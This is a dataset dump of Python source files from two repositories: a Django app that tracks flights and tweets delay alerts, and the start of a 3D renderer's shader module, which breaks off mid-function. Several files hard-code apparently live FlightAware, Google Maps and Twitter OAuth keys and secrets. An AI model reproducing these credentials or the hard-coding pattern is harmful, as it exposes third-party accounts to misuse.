index int64 | repo_name string | branch_name string | path string | content string | import_graph string |
|---|---|---|---|---|---|
49,695 | bigdatasciencegroup/flightr-project | refs/heads/master | /Flightaware/restAdapter.py |
class RestAdapter:
    """Holds connection settings for the FlightAware FlightXML3 REST API."""

    # Class-level defaults; shadowed by the instance attributes set in __init__.
    username = None
    apiKey = None
    url = None

    def __init__(self):
        # NOTE(review): credentials are hard-coded -- move to env vars/settings.
        self.username = 'RaspberyPirates'
        self.apiKey = '4b694ca29e116426788a13a11672f6722f3f3353'
        self.url = 'https://flightxml.flightaware.com/json/FlightXML3/'
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,696 | bigdatasciencegroup/flightr-project | refs/heads/master | /Presentation/views.py | from django.shortcuts import render
from Presentation.forms import FlightCheckForm
from Presentation.watcherService import WatcherService
def index(request):
    """Render the landing page with an empty flight-check form."""
    context = {'form': FlightCheckForm}
    return render(request, 'presentation/index.html', context)
def results(request, flight_number=None, twitter_handle=None):
    """Capture the main form submission and render the results page.

    Falls back to the URL-supplied defaults when a query parameter is
    absent or empty.
    """
    # BUG FIX: the original indexed request.GET directly, which raises
    # MultiValueDictKeyError when the query string omits a field; .get()
    # treats a missing parameter the same as an empty one.
    if request.GET.get('flight_number', '') != '':
        flight_number = request.GET['flight_number']
    if request.GET.get('twitter_handle', '') != '':
        twitter_handle = request.GET['twitter_handle']
    # NOTE(review): 'twitter_handel' spelling matches WatcherService.watch's
    # keyword parameter -- do not "fix" it here alone.
    details = WatcherService.watch(twitter_handel=twitter_handle,
                                   flight_number=flight_number)
    return render(request, 'presentation/results.html', {
        'vm': details,
    })
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,697 | bigdatasciencegroup/flightr-project | refs/heads/master | /Gmaps/googlemaps_service.py | """ Main google maps service """
import googlemaps
class GooglemapsService(object):
    """Wraps the ``googlemaps`` client for geocoding and travel-time lookups."""

    # NOTE(review): hard-coded API key -- put this in env variables/settings in live.
    api_key = 'AIzaSyCHAy-DjgELWCsLPVdciEhm8gSkt4XACTc'

    @staticmethod
    def get_reverse_geocode_result(userlat_long, result_type=None, location_type=None):
        """Reverse-geocode a user's lat/long and return the formatted address
        of the first result."""
        client = googlemaps.Client(key=GooglemapsService.api_key)
        results = client.reverse_geocode(userlat_long, result_type, location_type)
        return results[0]['formatted_address']

    @staticmethod
    def get_user_location(return_type=None):
        """Geolocate the service user.

        Returns a "lat,lng" string by default, or a formatted address when
        ``return_type == "address"``.
        """
        client = googlemaps.Client(key=GooglemapsService.api_key)
        located = client.geolocate()
        coords = "%s,%s" % (located['location']['lat'],
                            located['location']['lng'])
        if return_type is None:
            return_type = "coords"
        if return_type == "address":
            return GooglemapsService.get_reverse_geocode_result(coords)
        return coords

    @staticmethod
    def get_user_journey_time(origin=None, destination=None, time_type=None):
        """Travel time from origin to destination via the distance matrix.

        Defaults: origin = the user's geolocated position, destination =
        the Aberdeen Airport pickup zone, time_type = 'text' (human-readable;
        'value' selects the numeric duration instead).
        """
        if origin is None:
            origin = GooglemapsService.get_user_location()
        if destination is None:
            destination = "57.1975253, -2.2057843"
        if time_type is None:
            time_type = 'text'
        client = googlemaps.Client(key=GooglemapsService.api_key)
        matrix = client.distance_matrix(origin, destination)
        return matrix['rows'][0]['elements'][0]['duration'][time_type]
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,698 | bigdatasciencegroup/flightr-project | refs/heads/master | /Twitter/twitterAdapter.py | """Creates an object of the twitter api"""
from twython import Twython
class TwitterAdaptor:
    """Builds an authenticated Twython client for the Twitter API."""

    # Class-level defaults; shadowed by the instance attributes set in __init__.
    app_key = None
    app_secret = None
    oauth_token = None
    oauth_token_secret = None
    api = None

    def __init__(self):
        # NOTE(review): credentials are hard-coded -- move to env vars/settings.
        self.app_key = '4am7P2QD0tVygnfhXXsYKNxy0'
        self.app_secret = 'Fmngx5ds15AHxI1ePYfm91yT0wMV20C8t4yWzyY6VaqjetaXjQ'
        self.oauth_token = '905805253907546113-Jfy6Hfpeigfg92fnjnCo6v3XiexBrc5'
        self.oauth_token_secret = 'EoDjJBzh8m25Tl4CHZiutCbj7Ns0xks76bjvzSolDKUtM'
        self.api = Twython(self.app_key, self.app_secret,
                           self.oauth_token, self.oauth_token_secret)
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,699 | bigdatasciencegroup/flightr-project | refs/heads/master | /Flightaware/models.py |
class Flight:
    """Value object describing a single flight's status and timing."""

    # Class-level defaults; shadowed by the instance attributes set in __init__.
    # NOTE(review): 'fight_number' (sic) is relied on by callers elsewhere in
    # the project -- keep the misspelling.
    fight_number = None
    aircraft_type = None
    origin = None
    status = None
    actual_arrival_time = None
    estimated_arrival_time = None
    arrival_delay = None

    def __init__(self, flight_number, aircraft_type, origin, status,
                 actual_arrival_time, arrival_delay, estimated_arrival_time):
        self.fight_number = flight_number
        self.aircraft_type = aircraft_type
        self.origin = origin
        self.status = status
        self.actual_arrival_time = actual_arrival_time
        self.arrival_delay = arrival_delay
        self.estimated_arrival_time = estimated_arrival_time
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,700 | bigdatasciencegroup/flightr-project | refs/heads/master | /Presentation/tests.py | """Tests for the Presentation app module"""
from django.test import TestCase, Client
# Create your tests here.
class HttpTests(TestCase):
    """HTTP status-code checks for the Presentation app."""

    CLIENT = Client()

    def test_site_root_http_code(self):
        """The main site root should answer 200 OK."""
        self.assertEqual(self.CLIENT.get('').status_code, 200)
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,701 | bigdatasciencegroup/flightr-project | refs/heads/master | /Gmaps/tests.py | """ Test module for Gmaps App """
import requests
from django.test import TestCase
from Gmaps.googlemaps_service import GooglemapsService
# Create your tests here.
class GooglemapsTests(TestCase):
    """Test suite for the Google Maps service.

    NOTE(review): these tests hit the live Google geocoding API, so they
    require network access and a valid key to pass.
    """

    gmap = GooglemapsService()
    gmap_geocode_api = 'https://maps.googleapis.com/maps/api/geocode/json'
    # NOTE(review): hard-coded API key -- put this in env variables/settings in live.
    api_key = 'AIzaSyCHAy-DjgELWCsLPVdciEhm8gSkt4XACTc'

    def _reverse_geocode(self, latlng):
        """Issue a reverse-geocode request for latlng and return decoded JSON."""
        params = {
            'latlng': latlng,
            'sensor': 'false',
            'region': 'uk',
            'key': self.api_key,
        }
        return requests.get(self.gmap_geocode_api, params=params).json()

    def test_api_key_not_none(self):
        """The service must expose a non-empty API key."""
        assert self.gmap.api_key != ""

    def test_google_api_endpoint_status(self):
        """The geocode endpoint should report an OK status for our key."""
        res = self._reverse_geocode('51.5236819, -0.1586294')
        assert res['status'] == 'OK'

    def test_google_api_geolocation(self):
        """Coordinates sent to the geocoder should round-trip unchanged."""
        test_latlng_initial = '51.5236819, -0.1586294'
        res = self._reverse_geocode(test_latlng_initial)
        location = res['results'][0]['geometry']['location']
        coord_string = "%s, %s" % (location['lat'], location['lng'])
        assert coord_string == test_latlng_initial
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,702 | bigdatasciencegroup/flightr-project | refs/heads/master | /Presentation/forms.py | from django import forms
class FlightCheckForm(forms.Form):
    """Main submission form: a required flight number plus an optional handle."""

    flight_number = forms.CharField(
        required=True,
        widget=forms.TextInput(attrs={'class': 'form-control'}))
    twitter_handle = forms.CharField(
        required=False,
        widget=forms.TextInput(attrs={'class': 'form-control'}))
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,703 | bigdatasciencegroup/flightr-project | refs/heads/master | /Presentation/watcherService.py | import threading
from Flightaware.flightawareService import FlightawareService
from Gmaps.googlemaps_service import GooglemapsService
from Presentation.models import FlightDetails
from Twitter.TwitterService import TwitterService
import time
class WatcherService(object):
    """Polls flight status and notifies a Twitter user about changes."""

    @staticmethod
    def _format_duration(seconds):
        """Render a span of seconds as 'X Minutes' or 'X Hours and Y Minutes'."""
        minutes, _seconds = divmod(seconds, 60)
        hours, minutes = divmod(minutes, 60)
        if hours < 1:
            return "%d Minutes" % minutes
        return "%d Hours and %d Minutes" % (hours, minutes)

    @staticmethod
    def get_details(flight_number):
        """Build a FlightDetails view model for the given flight number."""
        flight = FlightawareService.find_flight(flight_number)
        epoch_time = int(time.time())
        journey_time = GooglemapsService.get_user_journey_time(time_type='value')
        # Expected touchdown, compensating for the reported delay.
        arrival_time = (flight.estimated_arrival_time['epoch'] - flight.arrival_delay)
        suggested_delay = (int(arrival_time) - int(epoch_time)) - int(journey_time)
        suggested_departure_time = (int(epoch_time) + suggested_delay)
        if flight.arrival_delay == 0:
            arrival_delay = "No delay"
        else:
            arrival_delay = WatcherService._format_duration(flight.arrival_delay)
        time_to_leave = WatcherService._format_duration(
            suggested_departure_time - int(epoch_time))
        suggested_departure_time = time.strftime(
            '%H:%M %d/%m/%Y', time.localtime(suggested_departure_time))
        journey_time = GooglemapsService.get_user_journey_time()
        return FlightDetails(flight_number=flight.fight_number,
                             flight_status=flight.status,
                             current_flight_delay=arrival_delay,
                             journey_time_to_airport=journey_time,
                             suggested_time_to_start_journey=suggested_departure_time,
                             time_till_leave_time=time_to_leave)

    @staticmethod
    def watch(twitter_handel, flight_number):
        """Return current details and keep watching in a background thread."""
        flight = WatcherService.get_details(flight_number)
        thread = threading.Thread(target=WatcherService.start_watch,
                                  args=(twitter_handel, flight_number))
        thread.start()
        return flight

    @staticmethod
    def start_watch(twitter_handel, flight_number):
        """Poll until the flight has arrived, tweeting every observed change.

        NOTE(review): this loop re-polls the external services back-to-back
        with no sleep; consider adding a polling interval.
        """
        flight = WatcherService.get_details(flight_number)
        status = None
        delay = None
        journey_time = None
        is_first_run = True
        while flight.flight_status != 'Arrived':
            if is_first_run:
                # BUG FIX: 'you flight' typo corrected in the first message.
                TwitterService.send_notification(
                    twitter_handle=twitter_handel,
                    message='The status of your flight is: ' + flight.flight_status)
                TwitterService.send_notification(
                    twitter_handle=twitter_handel,
                    message='Your flight is delayed by: ' + flight.current_flight_delay)
                TwitterService.send_notification(
                    twitter_handle=twitter_handel,
                    message='Your current journey time is: '
                            + flight.journey_time_to_airport)
                # Seed the change baselines so the first pass does not
                # immediately re-notify with the values just sent.
                status = flight.flight_status
                delay = flight.current_flight_delay
                journey_time = flight.journey_time_to_airport
                is_first_run = False
            if flight.flight_status != status:
                # BUG FIX: the original tweeted the stale value (None on the
                # first change, raising TypeError on str + None); report the
                # newly observed value instead.
                TwitterService.send_notification(
                    twitter_handle=twitter_handel,
                    message='The status of your flight is: ' + flight.flight_status)
                status = flight.flight_status
            if flight.current_flight_delay != delay:
                TwitterService.send_notification(
                    twitter_handle=twitter_handel,
                    message='Your flight is delayed by: ' + flight.current_flight_delay)
                delay = flight.current_flight_delay
            if flight.journey_time_to_airport != journey_time:
                TwitterService.send_notification(
                    twitter_handle=twitter_handel,
                    message='Your current journey time is: '
                            + flight.journey_time_to_airport
                            + ' You should start your journey at: '
                            + flight.suggested_time_to_start_journey)
                journey_time = flight.journey_time_to_airport
            flight = WatcherService.get_details(flight_number)
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,704 | bigdatasciencegroup/flightr-project | refs/heads/master | /Twitter/tests.py | from django.test import TestCase
from Twitter.twitterAdapter import TwitterAdaptor
class TwitterTests(TestCase):
    """Smoke tests for the Twitter adapter."""

    def test_adapter_initialises(self):
        """Constructing the adapter should yield a ready API client."""
        self.assertIsNotNone(TwitterAdaptor().api)
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,705 | bigdatasciencegroup/flightr-project | refs/heads/master | /Flightaware/tests.py | from django.test import TestCase
from mock import MagicMock
from Flightaware.flightawareService import FlightawareService
from Flightaware.models import Flight
class FlightawareTests(TestCase):
    """Tests for FlightawareService against a mocked HTTP response."""

    def test_find_flight(self):
        """find_flight should map the JSON payload onto a Flight model."""
        expected_flight = Flight(flight_number='N1234',
                                 aircraft_type='jet',
                                 origin='Berlin',
                                 status='Flying',
                                 actual_arrival_time='time',
                                 arrival_delay='time',
                                 estimated_arrival_time='time')
        payload = {'FlightInfoStatusResult': {'flights': [{
            'ident': expected_flight.fight_number,
            'aircrafttype': expected_flight.aircraft_type,
            'origin': expected_flight.origin,
            'status': expected_flight.status,
            'actual_arrival_time': expected_flight.actual_arrival_time,
            'arrival_delay': expected_flight.arrival_delay,
            'estimated_arrival_time': expected_flight.estimated_arrival_time,
        }]}}
        response = MagicMock()
        response.json = MagicMock(return_value=payload)
        actual_flight = FlightawareService.find_flight(
            expected_flight.fight_number, response)
        self.assertEqual(expected_flight.fight_number, actual_flight.fight_number)
        self.assertEqual(expected_flight.aircraft_type, actual_flight.aircraft_type)
        self.assertEqual(expected_flight.origin, actual_flight.origin)
| {"/Twitter/TwitterService.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/flightawareService.py": ["/Flightaware/models.py", "/Flightaware/restAdapter.py"], "/Presentation/views.py": ["/Presentation/forms.py", "/Presentation/watcherService.py"], "/Gmaps/tests.py": ["/Gmaps/googlemaps_service.py"], "/Presentation/watcherService.py": ["/Flightaware/flightawareService.py", "/Gmaps/googlemaps_service.py", "/Presentation/models.py", "/Twitter/TwitterService.py"], "/Twitter/tests.py": ["/Twitter/twitterAdapter.py"], "/Flightaware/tests.py": ["/Flightaware/flightawareService.py", "/Flightaware/models.py"]} |
49,707 | campeon19/Engine3D_Graficas | refs/heads/main | /Lab1.py | # Programa principal
# Christian Daniel Perez De Leon 19710
from gl import Renderer, V2

# Render-target size.
width = 940
height = 540
rend = Renderer(width, height)

# Polygon outlines (pixel coordinates) for the lab scene, drawn in order.
polygons = [
    [(165, 380), (185, 360), (180, 330), (207, 345), (233, 330),
     (230, 360), (250, 380), (220, 385), (205, 410), (193, 383)],
    [(321, 335), (288, 286), (339, 251), (374, 302)],
    [(377, 249), (411, 197), (436, 249)],
    [(413, 177), (448, 159), (502, 88), (553, 53), (535, 36), (676, 37),
     (660, 52), (750, 145), (761, 179), (672, 192), (659, 214), (615, 214),
     (632, 230), (580, 230), (597, 215), (552, 214), (517, 144), (466, 180)],
    [(682, 175), (708, 120), (735, 148), (739, 170)],
]
for outline in polygons:
    rend.glDrawPolygon(outline)
rend.glScanLine()

# Touch-up segments drawn on top of the filled scene: (start, end, rgb).
segments = [
    ((181, 330), (232, 330), (0, 0, 0)),
    ((182, 331), (231, 331), (0, 0, 0)),
    ((412, 197), (543, 197), (0, 0, 0)),
    ((413, 198), (543, 198), (0, 0, 0)),
    ((428, 230), (579, 230), (0, 0, 0)),
    ((413, 180), (534, 180), (0, 0, 0)),
    ((533, 175), (761, 175), (1, 1, 1)),
    ((416, 175), (473, 175), (1, 1, 1)),
    ((459, 144), (696, 144), (1, 1, 1)),
    ((731, 144), (749, 144), (1, 1, 1)),
    ((182, 335), (189, 335), (1, 1, 1)),
    ((224, 335), (231, 335), (1, 1, 1)),
]
for start, end, rgb in segments:
    rend.glLine(V2(*start), V2(*end), rend.glColor(*rgb))

rend.glFinish("Lab1.bmp")
49,708 | campeon19/Engine3D_Graficas | refs/heads/main | /shaders.py |
from itertools import count
import matematica as mate
import numpy as np
import random
def flat(render, **kwargs):
    """Flat shading: one face normal per triangle lights the whole fragment.

    Returns an (r, g, b) tuple in [0, 1], or black when the face points
    away from the light.
    """
    u, v, w = kwargs['baryCoords']
    tA, tB, tC = kwargs['texCoords']
    A, B, C = kwargs['verts']
    b, g, r = kwargs['color']
    b /= 255
    g /= 255
    r /= 255
    if render.active_texture:
        # Sample the texture at the barycentric-interpolated UV.
        tx = tA[0] * u + tB[0] * v + tC[0] * w
        ty = tA[1] * u + tB[1] * v + tC[1] * w
        texColor = render.active_texture.getColor(tx, ty)
        b *= texColor[0] / 255
        g *= texColor[1] / 255
        r *= texColor[2] / 255
    # Face normal from the triangle's two edges.
    normal = mate.productoCruz3D(mate.restaVect(B, A), mate.restaVect(C, A))
    normal = mate.normalizar3D(normal)
    intensity = mate.productoPunto(normal, render.directional_light)
    b *= intensity
    g *= intensity
    r *= intensity
    if intensity > 0:
        return r, g, b
    # Back-facing fragment: no light contribution.
    # (BUG FIX: removed the original's unreachable trailing `return r,g,b`.)
    return 0, 0, 0
def gourand(render, **kwargs):
    """Gouraud shading: per-vertex light intensities blended barycentrically.

    (Function name keeps the original 'gourand' spelling for callers.)
    """
    u, v, w = kwargs['baryCoords']
    tA, tB, tC = kwargs['texCoords']
    A, B, C = kwargs['verts']
    b, g, r = kwargs['color']
    nA, nB, nC = kwargs['normals']
    b, g, r = b / 255, g / 255, r / 255
    dirLight = [render.directional_light[0],
                render.directional_light[1],
                render.directional_light[2]]
    # Light each vertex, then interpolate the scalar intensities.
    intensity = (mate.productoPunto(nA, dirLight) * u
                 + mate.productoPunto(nB, dirLight) * v
                 + mate.productoPunto(nC, dirLight) * w)
    if intensity > 0:
        return r * intensity, g * intensity, b * intensity
    return 0, 0, 0
def phong(render, **kwargs):
    """Phong-style shading: the vertex normal is interpolated per fragment."""
    u, v, w = kwargs['baryCoords']
    tA, tB, tC = kwargs['texCoords']
    b, g, r = kwargs['color']
    nA, nB, nC = kwargs['normals']
    b, g, r = b / 255, g / 255, r / 255
    if render.active_texture:
        # Sample the texture at the barycentric-interpolated UV.
        tx = tA[0] * u + tB[0] * v + tC[0] * w
        ty = tA[1] * u + tB[1] * v + tC[1] * w
        texColor = render.active_texture.getColor(tx, ty)
        b *= texColor[0] / 255
        g *= texColor[1] / 255
        r *= texColor[2] / 255
    # Barycentric blend of the vertex normals.
    normal = (nA[0] * u + nB[0] * v + nC[0] * w,
              nA[1] * u + nB[1] * v + nC[1] * w,
              nA[2] * u + nB[2] * v + nC[2] * w)
    dirLight = [render.directional_light[0],
                render.directional_light[1],
                render.directional_light[2]]
    intensity = mate.productoPunto(normal, dirLight)
    # Clamp over-bright values to 1.
    intensity = min(intensity, 1)
    if intensity > 0:
        return r * intensity, g * intensity, b * intensity
    return 0, 0, 0
def unlit(render, **kwargs):
    """Unlit shading: base colour times the optional texture, no lighting."""
    u, v, w = kwargs['baryCoords']
    tA, tB, tC = kwargs['texCoords']
    b, g, r = kwargs['color']
    b, g, r = b / 255, g / 255, r / 255
    if render.active_texture:
        # Sample the texture at the barycentric-interpolated UV.
        tx = tA[0] * u + tB[0] * v + tC[0] * w
        ty = tA[1] * u + tB[1] * v + tC[1] * w
        texColor = render.active_texture.getColor(tx, ty)
        b *= texColor[0] / 255
        g *= texColor[1] / 255
        r *= texColor[2] / 255
    return r, g, b
def toon(render, **kwargs):
    """Toon shading: light intensity quantised into three flat bands."""
    u, v, w = kwargs['baryCoords']
    tA, tB, tC = kwargs['texCoords']
    b, g, r = kwargs['color']
    nA, nB, nC = kwargs['normals']
    b, g, r = b / 255, g / 255, r / 255
    if render.active_texture:
        # Sample the texture at the barycentric-interpolated UV.
        tx = tA[0] * u + tB[0] * v + tC[0] * w
        ty = tA[1] * u + tB[1] * v + tC[1] * w
        texColor = render.active_texture.getColor(tx, ty)
        b *= texColor[0] / 255
        g *= texColor[1] / 255
        r *= texColor[2] / 255
    # Barycentric blend of the vertex normals.
    normal = (nA[0] * u + nB[0] * v + nC[0] * w,
              nA[1] * u + nB[1] * v + nC[1] * w,
              nA[2] * u + nB[2] * v + nC[2] * w)
    dirLight = [render.directional_light[0],
                render.directional_light[1],
                render.directional_light[2]]
    intensity = mate.productoPunto(normal, dirLight)
    # Quantise into bright / mid / dark bands.
    if intensity > 0.7:
        intensity = 1
    elif intensity > 0.3:
        intensity = 0.5
    else:
        intensity = 0.05
    # The dark band is still > 0, so this branch always lights the fragment.
    if intensity > 0:
        return r * intensity, g * intensity, b * intensity
    return 0, 0, 0
def textureBlend(render, **kwargs):
    """Blend two textures by light intensity: lit areas keep the primary
    texture, shadowed areas fade toward the secondary one."""
    u, v, w = kwargs['baryCoords']
    tA, tB, tC = kwargs['texCoords']
    b, g, r = kwargs['color']
    nA, nB, nC = kwargs['normals']
    b, g, r = b / 255, g / 255, r / 255
    if render.active_texture:
        tx = tA[0] * u + tB[0] * v + tC[0] * w
        ty = tA[1] * u + tB[1] * v + tC[1] * w
        texColor = render.active_texture.getColor(tx, ty)
        b *= texColor[0] / 255
        g *= texColor[1] / 255
        r *= texColor[2] / 255
    # Barycentric blend of the vertex normals.
    normal = (nA[0] * u + nB[0] * v + nC[0] * w,
              nA[1] * u + nB[1] * v + nC[1] * w,
              nA[2] * u + nB[2] * v + nC[2] * w)
    # Light direction is negated here, unlike the other shaders.
    dirLight = [-render.directional_light[0],
                -render.directional_light[1],
                -render.directional_light[2]]
    intensity = mate.productoPunto(normal, dirLight)
    if intensity < 0:
        intensity = 0
    b *= intensity
    g *= intensity
    r *= intensity
    if render.active_texture2:
        # NOTE(review): tx/ty are only bound when active_texture was set
        # above; a second texture without a primary one raises NameError.
        texColor = render.active_texture2.getColor(tx, ty)
        b += (texColor[0] / 255) * (1 - intensity)
        g += (texColor[1] / 255) * (1 - intensity)
        r += (texColor[2] / 255) * (1 - intensity)
    return r, g, b
def normalMap(render, **kwargs):
    """Shade a fragment using a tangent-space normal map when one is bound.

    Falls back to plain interpolated-normal lighting when
    ``render.normal_map`` is not set.  Returns an (r, g, b) tuple, or
    black when the fragment faces away from the light.
    """
    A, B, C = kwargs['verts']
    u, v, w = kwargs['baryCoords']
    tA, tB, tC = kwargs['texCoords']
    b, g, r = kwargs['color']
    nA, nB, nC = kwargs['normals']
    b/= 255
    g/= 255
    r/= 255
    if render.active_texture:
        # Sample the diffuse texture at the barycentric-interpolated UV.
        tx = tA[0] * u + tB[0] * v + tC[0] * w
        ty = tA[1] * u + tB[1] * v + tC[1] * w
        texColor = render.active_texture.getColor(tx, ty)
        b *= texColor[0] / 255
        g *= texColor[1] / 255
        r *= texColor[2] / 255
    # Barycentric blend of the vertex normals.
    nX = nA[0] * u + nB[0] * v + nC[0] * w
    nY = nA[1] * u + nB[1] * v + nC[1] * w
    nZ = nA[2] * u + nB[2] * v + nC[2] * w
    normal = (nX, nY, nZ)
    dirLight = np.array(render.directional_light)
    if render.normal_map:
        # NOTE(review): tx/ty are only bound when active_texture was set
        # above -- a normal map without a diffuse texture raises NameError.
        # Decode the sampled normal from [0,255] channels (read in reverse
        # order, matching this file's b,g,r texColor convention) to [-1,1].
        texNormal = render.normal_map.getColor(tx, ty)
        texNormal = [(texNormal[2] / 255) * 2 - 1,
                     (texNormal[1] / 255) * 2 - 1,
                     (texNormal[0] / 255) * 2 - 1]
        texNormal = texNormal / np.linalg.norm(texNormal)
        # Build the tangent basis from the triangle's edges and UV deltas.
        edge1 = np.subtract(B, A)
        edge2 = np.subtract(C, A)
        deltaUV1 = np.subtract(tB, tA)
        deltaUV2 = np.subtract(tC, tA)
        f = 1 / (deltaUV1[0] * deltaUV2[1] - deltaUV2[0] * deltaUV1[1])
        tangent = [f * (deltaUV2[1] * edge1[0] - deltaUV1[1] * edge2[0]),
                   f * (deltaUV2[1] * edge1[1] - deltaUV1[1] * edge2[1]),
                   f * (deltaUV2[1] * edge1[2] - deltaUV1[1] * edge2[2])]
        tangent = tangent / np.linalg.norm(tangent)
        # Make the tangent orthogonal to the normal, then renormalise.
        tangent = np.subtract(tangent, np.multiply(np.dot(tangent, normal), normal))
        tangent = tangent / np.linalg.norm(tangent)
        bitangent = np.cross(normal, tangent)
        bitangent = bitangent / np.linalg.norm(bitangent)
        # Columns are tangent / bitangent / normal: maps the sampled
        # tangent-space normal into the mesh's space.
        tangentMatrix = np.matrix([[tangent[0], bitangent[0], normal[0]],
                                   [tangent[1], bitangent[1], normal[1]],
                                   [tangent[2], bitangent[2], normal[2]]])
        texNormal = tangentMatrix @ texNormal
        texNormal = texNormal.tolist()[0]
        texNormal = texNormal / np.linalg.norm(texNormal)
        intensity = np.dot(texNormal, dirLight)
    else:
        intensity = np.dot(normal, dirLight)
    b*= intensity
    g*= intensity
    r*= intensity
    if intensity > 0:
        return r, g, b
    else:
        return 0,0,0
def shader1(render, **kwargs):
    """Colour-inversion shading: invert the (textured) base colour, then light it."""
    u, v, w = kwargs['baryCoords']
    tA, tB, tC = kwargs['texCoords']
    b, g, r = kwargs['color']
    nA, nB, nC = kwargs['normals']
    b, g, r = b / 255, g / 255, r / 255
    if render.active_texture:
        # Sample the texture at the barycentric-interpolated UV.
